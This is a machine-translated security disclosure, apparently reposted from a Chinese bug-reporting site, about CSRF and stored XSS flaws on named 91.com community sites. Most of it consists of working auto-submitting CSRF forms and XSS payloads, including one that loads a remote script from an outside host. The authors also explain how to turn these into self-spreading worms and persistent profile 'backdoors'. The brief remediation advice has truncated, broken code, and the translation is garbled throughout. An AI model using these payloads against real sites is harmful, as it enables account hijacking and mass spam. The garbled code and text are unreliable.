A csrf vulnerability under Fujian wanglong may cause worms to spread.
Detailed Description: When receiving POST and GET information, the Referer of POST is not verified, and the token is not added to the POST information to verify the correctness of the information, cause the vulnerability.
Proof of vulnerability: [1]
Vulnerability address: http://t.91.com/broadcast/add
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://t.91.com/broadcast/add" method = "post">
<Input type = "text" name = "tid" value = ""/>
<Input type = "text" name = "content" value = "XX"/>
<Input type = "text" name = "secret" value = "0"/>
<Input type = "text" name = "video" value = ""/>
<Input type = "text" name = "upimg" value = ""/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Broadcast may be released in the 91 community without the user's knowledge.
========== Gorgeous split line ==========
[Second]
Vulnerability addresses: http://t.91.com/
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://t.91.com/" method = "get">
<Input type = "text" name = "controller" value = "friend"/>
<Input type = "text" name = "action" value = "follow"/>
<Input type = "text" name = "fid" value = "145243793"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
This may cause users to follow someone in an informed manner.
========== Gorgeous split line ==========
[Third]
Vulnerability address: http://bbs.91.com/member/sign
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://bbs.91.com/member/sign" method = "post">
<Input type = "text" name = "user_sign" value = "XXXX"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
The forum signature file may be modified if the user is unknown.
(This POST originally had a name = submit. Later, there was a conflict and I thought it would not work to delete the POST. Who knows whether it can still be POST ..)
========== Gorgeous split line ==========
[Part 4]
Vulnerability address: http://pz.91.com/port/comment_action.php
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://pz.91.com/port/comment_action.php" method = "post">
<Input type = "text" name = "content" value = "envy, so many equipment !!! "/>
<Input type = "text" name = "name" value = ""/>
<Input type = "text" name = "plain code" value = ""/>
<Input type = "text" name = "comment" value = "http://pz.91.com/html/2012/24/15/18428/index.htm"/>
<Input type = "text" name = "title" value = "Magic domain player best equipment"/>
<Input type = "text" name = "backUrl" value = "http://news.91.com/comment/ocommentsend.htm"/>
<Input type = "text" name = "url" value = "#"/>
<Input type = "text" name = "defind" value = ""/>
<Input type = "text" name = "charset_from" value = "gbk"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
The comments may be posted at the address of the comment box that is referenced in the user's unknown, with a large impact.
========== Gorgeous split line ==========
[Part 5]
Vulnerability address: http://t.91.com/broadcast/rebroadcast
<Html>
<Body> www.2cto.com
<Form id = "imlonghao" name = "imlonghao" action = "http://t.91.com/broadcast/rebroadcast" method = "post">
<Input type = "text" name = "ownermbrid" value = "485158345"/>
<Input type = "text" name = "oldbrtid" value = "631"/>
<Input type = "text" name = "curr_uid" value = "485158345"/>
<Input type = "text" name = "curr_brtid" value = "631"/>
<Input type = "text" name = "content" value = "XX"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
The broadcast may be forwarded if the user is unknown.
Solution:
Check POST Referer
Add token in POST information
Author: imlonghao
Everyone is sending the Internet dragon, what SQL Injection ah, CSRF, I also come to join in the fun, last night I went to flip the Internet dragon's XSS, then I saw two community types of sites, the estimation of Xss on other sites is also of little significance. Wanglong will go to work tomorrow. I will send a message this evening ~~
It is not difficult to search for several XSS instances. You can take a tutorial for new users looking for stored Xss instances.
Description: 1. First, the Forum. I tested the image function in Forum posts.
First, after sending an image normally, F12 starts the debugging tool and finds the newly sent image.
You can see that when you click an image, sjBBS. showImage. show is called.
View the code of sjBBS. showImage. show:
Var $ this = $ (obj ),
....
Src = $ this. attr ('src ');
....
Var con = "
Therefore, if we construct src as http: // image_server/2012/06/16/1339856778551/.png# 'onload = 'alert (/OK/); // aa.png
It will become
At this time, the code in onload will be executed.
Based on the above principles, we can send the following data.
POST http://bbs.91.com/modify/42/124/4fc6df44153b79013/p4fdc979dc7930c
------ WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name = "wysiwyg"
1
------ WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name = "post_body"
[Img] http: // image_server/2012/06/16/1339856778551/.png# 'onload = 'alert (/OK/); // aa.png [/img]
------ WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name = "ubb"
On
------ WebKitFormBoundaryTPxWRJUHf4rt3qZa --
If we make the text on the image as follows:
Click here to see the beauty !!!!!!!!!!!
When users click, they will be recruited !!
--------------------------------------------------
2. Xss stored in Community personal data can be used as Xss backdoors,
Every time a user views his/her user information (that is, when the user enters http://t.91.com/member/usersettings ),
Will execute our JS Code or JS files.
Because the backdoor is under the t.91.com domain name, it can be combined with the t.91.com Weibo function mentioned later.
I will not discuss it here. The following is a drawback: uniquename is filtered, but nickname is not filtered.
As for the following email and mobile values, check if they are filtered. I didn't check them. If they are not filtered, please filter them together!
Http://t.91.com/member/Ajax_Profile
Uniquename bdhxxxxxxxxyyy
Old_uniquename visitor 293464167221304
Nickname aaaavv "> <
Nickname_hidden visitor 293464167221304
Realname Li Ming
Sex 0
Birth_year 0
Birth_month 0
Birth_day 1
Birthprovince 0
Birthcity 0
Resideprovince 510000
Residecity 510100
Resideprovince_hidden Sichuan Province
Residecity_hidden Chengdu
Email
Mobile
Homepage
Interest
Introduction
Vulnerability effect, such:
Every time a user enters the personal data page, it will trigger our JS Code. At the same time, we can hijack the [Save button] so that every time a user modifies his/her personal data, they all carry our malicious code to form long-term hijacking.
--------------------------------------------------
3. Weibo image function XSS
The reason for this vulnerability is too simple. I will not mention that the image field upimg does not filter double quotation marks. As a result, you can directly add the onload attribute to run the code.
POST http://t.91.com/broadcast/add
Tid
Content aaaaaaaaaaaaaa
Secret 0
Video
The upimg http://p2.91huo.cn/t91/broadcast/c7/2d/91/c72d9149f543841f5ce0175f1f96cc1e.small.png "onload =" alert (document. cookie );
The above upimg is a constructed parameter.
After we publish a microblog, our users will be followed by XSS, which can be used as worms.
That is, users who see this microblog will automatically send a Weibo message with XSS, which will spread across t.qq.com.
Open the debugging tool and check the injected code.
--------------------------------------------------
4. Weibo link function Xss
Or Weibo, the links are carefully constructed, and we can execute our malicious JS Code to cause Weibo worms.
The error message returned when the UBB tag [url: address] XXXX [/url] is output.
Http://t.91.com/broadcast/add
Tid
Content # null # [url: http://www.baidu.com & lt; img/src = & quot; 1 & quot; onerror = & quot; alert & # x28;/xxxxxx/) & quot; & gt;] aaaaaaaa [/url]
Secret 0
Video
Upimg
This is a bit interesting.
A. The Code cannot contain (),
B. if we use, & #28; & #29; to represent (), & #28; & #29; In #... # Will be considered as a microblog topic #...
So here I use & # x28;...) to bypass this restriction.
Construct content as the following code
# Null # [url: http://www.baidu.com & lt; img/src = & quot; 1 & quot; onerror = & quot; jQuery. getScript & # x28; '// xsst.sinaapp.com/m.js') & quot; & gt;] aaaaaaaa
Open the debugging tool and view
Solution: 1. Modify the sjBBS. showImage. show function in Xss.
Convert var con = "
Change
Function filterfunc (str ){
Return str. replace (// g, "& amp ;"). replace (/'/g, "& # x27 ;"). replace (// \/g, "& # x5c ;");
}
Var con = " ";
2. This is a regular input and output, which is filtered when the nickname is output <>. If other fields in the personal data are not filtered, the same applies.
3. filter the ",>, \, and other symbols in upimg and replace &;
4. After I added the test content, I constructed the code based on the output. I don't know what processing logic is on your server .. It's messy. Let's do it!
Author: gainover